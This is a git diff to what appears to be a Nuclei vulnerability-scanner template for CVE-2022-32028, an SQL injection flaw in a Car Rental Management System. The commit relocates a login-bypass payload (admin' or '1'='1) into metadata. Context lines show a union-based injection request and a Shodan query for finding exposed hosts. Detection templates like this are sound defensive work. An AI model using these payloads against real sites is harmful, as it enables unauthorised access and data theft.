Update CVE-2022-32028.yaml
parent
23c6e7f4d2
commit
079f21a07e
|
@ -12,6 +12,7 @@ info:
|
|||
metadata:
|
||||
verified: true
|
||||
shodan-query: http.html:"Car Rental Management System"
|
||||
comment: Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username.
|
||||
tags: cve,cve2022,carrental,cms,sqli,authenticated
|
||||
|
||||
variables:
|
||||
|
@ -19,7 +20,6 @@ variables:
|
|||
|
||||
requests:
|
||||
- raw:
|
||||
# Login bypass possible using a payload: admin'+or+'1'%3D'1' in username.
|
||||
- |
|
||||
POST /admin/ajax.php?action=login HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
@ -31,6 +31,7 @@ requests:
|
|||
GET /admin/manage_user.php?id=-1%20union%20select%201,md5({{num}}),3,4,5--+ HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
skip-variables-check: true
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
cookie-reuse: true
|
||||
|
|
Loading…
Reference in New Issue